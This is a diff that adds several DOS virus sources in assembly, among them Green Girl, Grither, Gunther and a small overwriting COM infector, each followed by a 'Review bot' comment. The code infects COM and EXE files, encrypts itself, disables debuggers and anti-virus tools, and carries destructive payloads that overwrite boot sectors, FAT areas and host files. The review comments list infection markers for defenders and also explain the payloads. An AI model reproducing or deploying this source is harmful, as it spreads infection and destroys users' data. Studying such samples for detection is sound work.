MOV WORD PTR [BP+OFFSET FILE_HEADER+04H],DX
MOV WORD PTR [BP+OFFSET FILE_HEADER+02H],AX
; Increase minimum memory requirements to
; ORIG_MEM + VIRUS_MEM = TOTAL_MEM 8)
MOV AX,OFFSET END_FILE-OFFSET BEGIN
MOV CL,4 ;
SHR AX,CL ;
;
ADD AX,WORD PTR [BP+OFFSET FILE_HEADER+0AH]
MOV WORD PTR [BP+OFFSET FILE_HEADER+0AH],AX
;
POP BX ; Get handle again
;
MOOWAAHAAHAAHAA: ; Infect the wanker!
XOR AL,AL ; Move to da start of da file
CALL POINTER_MOVER ;
;
MOV CX,01AH ; Write header
MOV AH,040H ;
LEA DX,OFFSET FILE_HEADER+BP
INT 021H ;
; So that the virus, when executing of its
; new host knows that it will restore the bytes
; as if attatched to a .EXE file
MOV AL, BYTE PTR [OFFSET COM_OR_EXE+BP]
PUSH AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],1
;
END_WRITER: ;
MOV AL,02H ; Move to da end of da file
CALL POINTER_MOVER ;
;
MAKE_NEW_ENC_VALUE: ; Get a new random encryption value
MOV AH,2CH ;
INT 21H ;
MOV BYTE PTR [OFFSET ENCRYPTION_VALUE+BP],DL
;
END_XOR: ; End XOR here
; Make it my BAAAABBYYYY
CALL XORER ;
CALL NOTTER ;
;
MOV CX,OFFSET END_VIRUS-OFFSET BEGIN
MOV AH,40H ;
LEA DX,OFFSET BEGIN+BP ;
INT 021H ;
;
CALL NOTTER ; Decrypt virus
CALL XORER ;
; Restore original com_or_exe value
POP AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],AL
;
CALL RESET_ATTRIBS ;
CALL CLOSE_FILE ;
JMP END_ALL ;
;
;
XORER: ;
CLD ; String instruction increment
MOV ES,CS ;
MOV AH, [OFFSET ENCRYPTION_VALUE+BP]
MOV CX, OFFSET END_XOR-OFFSET START_XOR
LEA SI, [OFFSET START_XOR+BP]
MOV DI, SI ;
;
XOR_LOOPER: ;
LODSB ;
XOR AL,AH ;
STOSB ;
LOOP XOR_LOOPER ;
RET ;
;
NOTTER: ;
CLD ; Make sure string instructions increment
MOV ES,CS ;
MOV CX,OFFSET NOTTER-OFFSET XORER
LEA SI,[OFFSET XORER+BP]
MOV DI,SI ;
;
NOT_LOOPER: ;
LODSB ;
NOT AL ;
STOSB ;
LOOP NOT_LOOPER ;
RET ;
;
ENCRYPTION_VALUE DB 0 ;
ENC_OR_NOT DB 0 ; To encrypt or not to encrypt
SLASH DB '\' ; For directory traversal functions
;
END_VIRUS: ; Everything from here on is not written
; to infected files
;
DIR_BUFFER DB 64 DUP (?) ; For directory traversal functions
NEW_DTA_AREA DB 128 DUP (?) ; New DTA place
ATTRIBS DW 0 ; Buffer for file attributes
TIME DW 0 ; " " " time
DATE DW 0 ; " " " date
FILE_HEADER DB 01AH DUP (?) ; File Header Read/Write Buffer
OLD_ERROR DW 0,0 ; Hold old error handler address
OLD_DATA DB 512 DUP (?) ; Holds old boot block
;
END_FILE: ;
GREEN_GIRL ENDS ;
END BEGIN ;
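Review bot: The feature list at the top of the file is wrong on one point: it advertises an `INT 042H Handler`, but the only vector the code installs is INT 24h (`MOV AX,02524H` / `LEA DX, OFFSET NEW_ERROR_HANDLER+BP` under SET_ERRORS, with the handler at NEW_ERROR_HANDLER doing `MOV AL,3` / `IRET` to fail the call), so that line should read `; - INT 024H (critical error) handler, fails the call silently`. The header also never states the infection marker a defender would catalogue: infected EXEs carry the word `'GG'` in the header word at offset 12h, written at `MOV WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'` in MODIFY_HEADER and tested in CHECK_INFECTED, while COM hosts are only recognised by the trailing `'\'` byte read at NOT_DOS_FILE. The activation path under BOOTER is the destructive part of the file and deserves a line of its own in the header: on 3 July it reads sector 1 of drive 0 (`MOV AX,0201H` / `MOV CX,1` / `XOR DX,DX`, i.e. the boot sector of A:), saves it to `A:\BOOT.SEC`, writes the START_WRITE block back over it with `MOV AX,0301H` / `INT 13H`, and then forces a reboot through the far jump to FFFF:0000.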
@@ -0,0 +1,330 @@
;**************************************************************************
;** GRITHER VIRUS **
;** Created: 27 Oct 1990 **
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on **
;** *.COMs and will re-write the begining sectors of drive **
;** C: & D:! Erasing the FATs area... **
;** **
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
data_1e equ 2Ch ; (65AC:002C=0)
data_2e equ 75h ; (65AC:0075=0)
data_3e equ 79h ; (65AC:0079=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
grither proc far
start:
;* jmp short loc_1 ;*(0112)
db 0EBh, 10h
db 90h
data_5 db 'Qº', 9, 3, 'ü‹òÆ' ; Data table (indexed access)
db 0Ah, 0
db 0BFh, 0, 1, 0B9h, 3, 0
db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
db 0CDh, 21h, 3Ch, 0, 75h, 3
db 0E9h, 0C5h, 1
loc_2:
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov [si+0],bx
nop ;*Fixup for MASM (M)
mov [si+2],es
nop ;*Fixup for MASM (M)
pop es
mov dx,5Fh
nop
add dx,si
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
push es
push si
mov es,ds:data_1e ; (65AC:002C=0)
mov di,0
loc_3:
pop si
push si
add si,1Ah
nop ;*Fixup for MASM (M)
lodsb ; String [si] to al
mov cx,8000h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,4
locloop_4:
lodsb ; String [si] to al
scasb ; Scan es:[di] for al
jnz loc_3 ; Jump if not zero
loop locloop_4 ; Loop if cx > 0
pop si
pop es
mov [si+16h],di
nop ;*Fixup for MASM (M)
mov di,si
nop
add di,1Fh
nop ;*Fixup for MASM (M)
mov bx,si
add si,1Fh
nop ;*Fixup for MASM (M)
mov di,si
jmp short loc_10 ; (01B9)
loc_5:
cmp word ptr [si+16h],0
nop ;*Fixup for MASM (M)
jne loc_6 ; Jump if not equal
jmp loc_19 ; (02E9)
loc_6:
push ds
push si
mov ds,es:data_1e ; (65AC:002C=0)
mov di,si
mov si,es:[di+16h]
nop ;*Fixup for MASM (M)
add di,1Fh
nop ;*Fixup for MASM (M)
loc_7:
lodsb ; String [si] to al
cmp al,3Bh ; ';'
je loc_9 ; Jump if equal
cmp al,0
je loc_8 ; Jump if equal
stosb ; Store al to es:[di]
jmp short loc_7 ; (019B)
loc_8:
mov si,0
loc_9:
pop bx
pop ds
mov [bx+16h],si
nop ;*Fixup for MASM (M)
nop
cmp ch,5Ch ; '\'
je loc_10 ; Jump if equal
mov al,5Ch ; '\'
stosb ; Store al to es:[di]
loc_10:
mov [bx+18h],di
nop ;*Fixup for MASM (M)
mov si,bx
add si,10h
nop ;*Fixup for MASM (M)
mov cx,6
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov si,bx
mov ah,4Eh ; 'N'
mov dx,1Fh
nop
add dx,si
mov cx,3
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jmp short loc_12 ; (01DD)
loc_11:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
loc_12:
jnc loc_13 ; Jump if carry=0
jmp short loc_5 ; (017F)
loc_13:
mov ax,ds:data_2e[si] ; (65AC:0075=0)
and al,1Fh
cmp al,1Fh
je loc_11 ; Jump if equal
cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0)
ja loc_11 ; Jump if above
cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0)
jb loc_11 ; Jump if below
mov di,[si+18h]
nop ;*Fixup for MASM (M)
push si
add si,7Dh
nop ;*Fixup for MASM (M)
loc_14:
lodsb ; String [si] to al
stosb ; Store al to es:[di]
cmp al,0
jne loc_14 ; Jump if not equal
pop si
mov ax,4300h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov [si+8],cx
nop ;*Fixup for MASM (M)
mov ax,4301h
and cx,0FFFEh
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ax,3D02h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_15 ; Jump if carry=0
jmp loc_18 ; (02DA)
loc_15:
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov [si+4],cx
nop ;*Fixup for MASM (M)
mov [si+6],dx
nop ;*Fixup for MASM (M)
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
and dh,7
jnz loc_16 ; Jump if not zero
mov ah,40h ; '@'
mov cx,85h
mov dx,si
add dx,8Ah
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_17 ; (02C3)
db 90h
loc_16:
mov ah,3Fh ; '?'
mov cx,3
mov dx,0Ah
nop
add dx,si
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,3
jne loc_17 ; Jump if not equal
mov ax,4202h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov cx,ax
sub ax,3
mov [si+0Eh],ax
nop ;*Fixup for MASM (M)
add cx,2F7h
mov di,si
sub di,1F5h
mov [di],cx
mov ah,40h ; '@'
mov cx,306h
mov dx,si
sub dx,1F7h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,306h
jne loc_17 ; Jump if not equal
mov ax,4200h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov ah,40h ; '@'
mov cx,3
mov dx,si
add dx,0Dh
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_17:
mov dx,[si+6]
nop ;*Fixup for MASM (M)
mov cx,[si+4]
nop ;*Fixup for MASM (M)
and cx,0FFE0h
or cx,1Fh
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_18:
mov ax,4301h
mov cx,[si+8]
nop ;*Fixup for MASM (M)
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_19:
push ds
mov ah,1Ah
mov dx,[si+0]
nop ;*Fixup for MASM (M)
mov ds,[si+2]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
pop ds
loc_20:
pop cx
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
mov di,100h
push di
xor di,di ; Zero register
retn 0FFFFh
db 10 dup (0)
db 0CDh, 20h, 90h, 0E9h, 0, 0
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
db 0, 0, 0, 0, 50h, 41h
db 54h, 48h, 3Dh, 0, 0
db 105 dup (0)
db 0EBh, 58h, 90h
db ' `7O `88@99@6r `65@85M%AACC%YMJ%'
db 'LWNYMJW%AACC% `:@86@95r `68@87MH'
db 'tzwyjx~%tk%Jqj}nts `5r$'
db '3'
db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
db 0A0h, 0, 33h, 0D2h, 0BBh, 0
db 0, 0CDh, 26h, 0BBh, 0, 0
loc_21:
cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$'
je loc_22 ; Jump if equal
sub byte ptr data_5[bx],5 ; (65AC:0103=90h)
inc bx
jmp short loc_21 ; (0400)
loc_22:
mov dx,offset data_5 ; (65AC:0103=90h)
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
grither endp
seg_a ends
end start
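Review bot: The infection marker the code depends on is not documented anywhere in the header block, and it is the trait a file-system audit can key on: loc_17 restores the host timestamp with the seconds field forced to 1Fh (`and cx,0FFE0h` / `or cx,1Fh`, i.e. a 62-second value), and loc_13 skips any candidate whose seconds field already reads 1Fh (`and al,1Fh` / `cmp al,1Fh` / `je loc_11`), the classic Vienna-family mark the `[NukE]` note alludes to. loc_13 also bounds targets to COM files between 0Ah and 0FA00h bytes via the two compares on `data_3e[si]`. The header's claim that the virus rewrites the first sectors of C: and D: is not visible as instructions in this listing; the disassembler left the payload as raw `db` runs (the bytes ending `0CDh, 26h`, which decode to INT 26h, just before loc_21), and the branch at `and dh,7` / `jnz loc_16` writes 85h bytes over the start of the opened host (`mov ah,40h` / `mov cx,85h`) instead of appending, so hosts hit on that path are overwritten rather than infected. A short `; Markers: seconds=1Fh; size 0Ah..0FA00h; 1-in-8 hosts overwritten with INT 26h payload` comment in the header would make the sample's behaviour clear without reading the bytes.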

@@ -0,0 +1,422 @@
; 'Gunther': A Virus From the Virus Creation 2000 System
; The Virus Creation 2000 System is Copywrited by John Burnette
; All Rights Reserved.
; Author: Havoc The Chaos
; Notes: Fr my lurv, Kiersten B.
; Greetings: Dark Angel, DecimatoR, Dark Avenger (You still out there?)
; The Additude Adjuster, Mucho Mass, The Old Bit Truth Crew,
; and virus writters (Except those who rely on kits and call
; them original code) everywhere!
code segment byte public
assume cs: code
org 100h
id = '=-'
begin:
call next ; Get Delta Offset
next: pop bp
sub bp, offset next
push cs
push cs
pop ds
pop es
mov byte ptr [bp + lock_keys + 3], 244
; Prefetch Cue Unchanged
lock_keys:
mov al, 128 ; Screws DEBUG
out 21h, al ; If Tracing, Lock Keyboard
mov ax, 4653h ; Remove F-Prot Utils
mov bx, 1
mov cx, 2
rep int 2Fh
mov byte ptr cs:[tb_here][bp], 0 ; Reset TB Flag
xor dx, dx
mov ds, dx
mov ax, word ptr ds:[6]
dec ax
mov ds, ax
mov cx, 0FFFFh ; CX = 64k
mov si, dx ; SI = 0
look_4_tbclean:
mov ax, word ptr ds:[si]
xor ax, 0A5F3h
je check_it ; Jump If It's TBClean
look_again:
inc si ; Continue Search
loop look_4_tbclean
jmp not_found ; TBClean Not Found
check_it:
mov ax, word ptr ds:[si+4]
xor ax, 0006h
jne look_again
mov ax, word ptr ds:[si+10]
xor ax, 020Eh
jne look_again
mov ax, word ptr ds:[si+12]
xor ax, 0C700h
jne look_again
mov ax, word ptr ds:[si+14]
xor ax, 406h
jne look_again
mov bx, word ptr ds:[si+17] ; Steal REAL Int 1 Offset
mov byte ptr ds:[bx+16], 0CFh ; Replace With IRET
mov bx, word ptr ds:[si+27] ; Steal REAL Int 3 Offset
mov byte ptr ds:[bx+16], 0CFh ; Replece With IRET
mov byte ptr cs:[tb_here][bp], 1 ; Set The TB Flag On
mov bx, word ptr ds:[si+51h] ; Get 2nd Segment of
mov word ptr cs:[tb_int2][bp], bx ; Vector Table
mov bx, word ptr ds:[si-5] ; Get Offset of 1st Copy
mov word ptr cs:[tb_ints][bp], bx ; of Vector Table
not_found:
mov cx, 9EBh
mov ax, 0FE05h
jmp $-2
add ah, 3Bh ; Hlt Instruction (Kills TD)
jmp $-10
mov ax, 0CA00h ; Exit It TBSCANX In Mem
mov bx, 'TB'
int 2Fh
cmp al, 0
je okay
ret
okay:
mov ah, 47h
xor dl, dl
lea si, [bp+offset dir_buff+1] ; Save Original Directory
int 21h
push es ; New DTA
push ds
mov ah, 1Ah
lea dx, [bp+offset newDTA]
int 21h
lea di, [bp+offset origCSIP2] ; Save For EXE
lea si, [bp+offset origCSIP]
mov cx, 4
rep movsw
mov byte ptr [bp+numinfected], 0
mov ax, 3524h ; New INT 24h Handler
int 21h
mov ax, 2524h
mov dx, offset Int24
int 21h
traverse_path proc near
push bp
pop bx
mov es, word ptr cs:[2Ch] ; ES = Environment Segment
xor di, di ; DI = Starting Offset
find_path:
mov dx,'As'
int 0F2h
lea si,[bx + path_string] ; SI points to "PATH="
lodsb ; Load First Byte in AL
mov cx,08000h ; Check 32767 Bytes
repne scasb ; Search Until The Byte Is Found
mov cx,4 ; Check The Next Four Bytes
check_next_4:
lodsb ; Load The Next Letter of "PATH="
scasb ; Compare It To Environment
jne find_path ; Get Another
loop check_next_4 ; Keep Checking
mov word ptr [bx + path_ad], di ; Save The PATH Address
mov word ptr [bx + path_ad + 2], es ; Save The PATH's Segment
lds si,dword ptr [bx + path_ad] ; DS:SI Points to PATH
lea di,[bp - 70] ; DI = Work Buffer
push cs
pop es
move_subdir:
lodsb ; Load Next Byte
cmp al,';' ; Separator?
je moved_one ; Yes, We're Done
or al,al ; End of Path?
je moved_last_one ; Yes, Quit Our Loop
stosb ; Store Byte at ES:DI
jmp short move_subdir ; Keep Transfering Characters
moved_last_one:
xor si, si ; Clear Buffer
moved_one:
mov word ptr es:[bx + path_ad],si ; Store SI in the path address
cmp si, 0 ; Done?
je done ; Done.
mov ah, 3Bh ; Change Directory
lea dx, [bx + path_ad]
int 21h
lea dx, [di + com_spec] ; Find COM Files
call infect
lea dx, [di + exe_spec] ; Find EXE Files
call infect
lea dx, [di + ovr_spec] ; Find OV? Files
call infect
lea dx, [di + bin_spec] ; Find Binary Files
call infect
jmp move_subdir ; Get Another Sub-Directory
done: ret
traverse_path endp
pop ds ; Restore DTA
pop es
mov ah, 1Ah
mov dx, 80h
int 21h
cmp sp, id ; EXE?
jne infect
restore_exe: ; Restore EXE
mov ax, ds
add ax, 10h
add cs:[bp+word ptr origCSIP2+2], ax
add ax, cs:[bp+word ptr origSPSS2]
cli
mov ss, ax
mov sp, cs:[bp+word ptr origSPSS2+2]
sti
db 00EAh ; Jump To The Original Code
origCSIP2 db ?
old3_2 db ?,?,?
origSPSS2 dd ?
origCSIP db ?
old3 db 0cdh,20h,0
origSPSS dd ?
restore_com: ; Restore COM
mov di, 100h
push di
lea si, [bp+offset old3_2]
movsw
movsb
return: ret ; Jump To Original Code
infect:
mov cx, 7
mov ah, 4Eh ; Find First File
findfirstnext:
int 21h
jc return
cmp word ptr [bp+newDTA+33], 'AM' ; COMMAND.COM?
mov ah, 4Fh
jz findfirstnext ; Yes, So Get Another File
lea dx, [bp+newDTA+30] ; Get Attributes
mov ax, 4300h
int 21h
jc return
push cx ; Save Them
push dx
mov ax, 4301h ; Clear Attributes
push ax
xor cx, cx
int 21h
mov ax, 3D02h ; Open File, Read/Write
lea dx, [bp+newDTA+30]
int 21h
xchg ax, bx
mov ax, 5700h ; Get File Time/Date
int 21h
push cx ; Save Time/Date
push dx
mov ah, 3Fh
mov cx, 1Ah ; Read Into File
lea dx, [bp+offset readbuffer]
int 21h
mov ax, 4202h ; Move Pointer To End Of File
xor cx, cx
cwd
int 21h
cmp word ptr [bp+offset readbuffer], 'ZM' ; EXE?
jz checkexe
mov cx, word ptr [bp+offset readbuffer+1]
add cx, heap-begin+3 ; CX = Filesize
cmp ax, cx
jz jmp_close ; Already Infected
cmp ax, 65535-(endheap-begin) ; Too Large To Infect?
ja jmp_close
lea di, [bp+offset old3] ; Save First Three Bytes
lea si, [bp+offset readbuffer]
movsb
movsw
mov cx, 3 ; Encoded Jump To Virus
sub ax, cx
mov word ptr [bp+offset readbuffer+1], ax
mov dl, 0E9h
mov byte ptr [bp+offset readbuffer], dl
jmp short continue_infect
checkexe:
cmp word ptr [bp+offset readbuffer+10h], id
jnz skipp ; Not Infected, So Infect It
jmp_close:
jmp close ; Infected, So Quit
skipp: lea di, [bp+origCSIP]
lea si, [bp+readbuffer+14h]
movsw ; Save CS and IP
movsw
sub si, 0Ah ; Save SS and SP
movsw
movsw
push bx ; Filename
mov bx, word ptr [bp+readbuffer+8] ; Header Size
mov cl, 4
shl bx, cl
push dx
push ax
sub ax, bx ; File Size - Header Size
sbb dx, 0
mov cx, 10h
div cx
mov word ptr [bp+readbuffer+0Eh], ax ; SS
mov word ptr [bp+readbuffer+10h], id ; SP
mov word ptr [bp+readbuffer+14h], dx ; IP
mov word ptr [bp+readbuffer+16h], ax ; CS
pop ax
pop dx
add ax, heap-begin
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1
mov word ptr [bp+readbuffer+2], ax
mov word ptr [bp+readbuffer+4], dx ; Fix Header
pop bx
mov cx, 1Ah
continue_infect:
mov ah, 40h
mov cx, heap-begin ; Add Virus To The End
lea dx, [bp+offset begin]
int 21h
mov ax, 4200h
xor cx, cx ; Move Pointer To Beginning
cwd
int 21h
mov ah, 40h
mov cx, 1Ah ; Write Encoded Jump To Virus
lea dx, [bp+offset readbuffer]
int 21h
inc [bp+numinfected] ; Infection Good
close:
mov ax, 5701h ; Set Orig Date and Time
pop dx
pop cx
int 21h
mov ah, 3Eh ; Close File
int 21h
pop ax ; Restore Attributes
pop dx
pop cx
int 21h
cmp [bp+numinfected], 5
jae bye
mov ah, 4Fh ; No, So Find Another File
jmp findfirstnext
mov ax, 2524h ; New INT 24h Handler
pop dx
pop ds
int 21h
mov ah, 3Bh ; Function: Change Directory
lea dx, [bp+dir_buff] ; Restore Current Directory
int 21h ; Execute Function
bye: ret
Int24: mov ax, 3 ; Error Handling
iret
exe_spec db '*.EXE',0 ; EXE Filespec
ovr_spec db '*.OV?',0 ; OV? Filespec
bin_spec db '*.BIN',0 ; BIN Filespec
com_spec db '*.COM',0 ; COM Filespec
path_string db "PATH=" ; The PATH String To Search For
heap:
donebin db 0
dir_buff db 64 dup (0) ; Current Dir Buffer
newdta db 43 dup (?) ; New Disk Transfer Access
numinfected db ? ; Number Of Files Infected
path_ad dd ? ; Holds The PATH's Address
tb_ints dd 0
tb_int2 dd 0
tb_here db 0
readbuffer db 1ah dup (?)
endheap:
code ends
end begin
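Review bot: The header comment names the kit and the greetings but never states the host-type markers the infection routine keys on, which is what a defender reading this wants first: for EXE hosts the `id` word `'=-'` is written into the header's initial-SP field (`mov word ptr [bp+readbuffer+10h], id ; SP`) and tested at `cmp word ptr [bp+offset readbuffer+10h], id`, while for COM hosts infection is inferred from size alone (`add cx, heap-begin+3` / `cmp ax, cx`), so a COM file whose length happens to match its first-jump target plus the virus length is skipped as already infected. The search loop also skips COMMAND.COM by name (`cmp word ptr [bp+newDTA+33], 'AM'`) and stops after five infections (`cmp [bp+numinfected], 5` / `jae bye`), and the installed critical-error handler (`Int24: mov ax, 3` / `iret`) fails the call rather than prompting, so write-protect errors produce no visible message. I would add a `; Infection markers and limits:` block to the header stating those facts; the `traverse_path proc` placed inline between the INT 24h setup and the `pop ds` restore is also a layout oddity worth a comment, since the proc body is reached by fall-through from the `int 21h` above it rather than by a `call`.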
+21
@@ -0,0 +1,21 @@
xor cx,cx
mov dx,offset File
mov ah,4eh
int 21h
z:
mov dx,9eh
mov ax,3d02h
int 21h
mov bx,ax
mov dx,100h
mov cl,27h
mov ah,40h
int 21h
mov ah,3eh
int 21h
mov ah,4fh
int 21h
jnc z
ret
file db '*.com',0
e:
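Review bot: The fragment has no header comment at all, and what it does should be stated for whoever catalogues it: it searches `*.com` in the current directory (`mov dx,offset File` / `mov ah,4eh`), opens each match through the DTA filename at 9Eh (`mov dx,9eh` / `mov ax,3d02h`), and writes 27h bytes starting at offset 100h (`mov dx,100h` / `mov cl,27h` / `mov ah,40h`) over the beginning of the file, so every host is overwritten in place and the original bytes are not recoverable from the file. A one-line header such as `; overwriting COM infector: replaces the first 27h bytes of every *.com in the current directory with its own image; hosts are destroyed, not infected` would cover it. The write length is a bare immediate; naming it (e.g. an `equ` for the image size) would make the relationship between the 27h constant and the code length explicit.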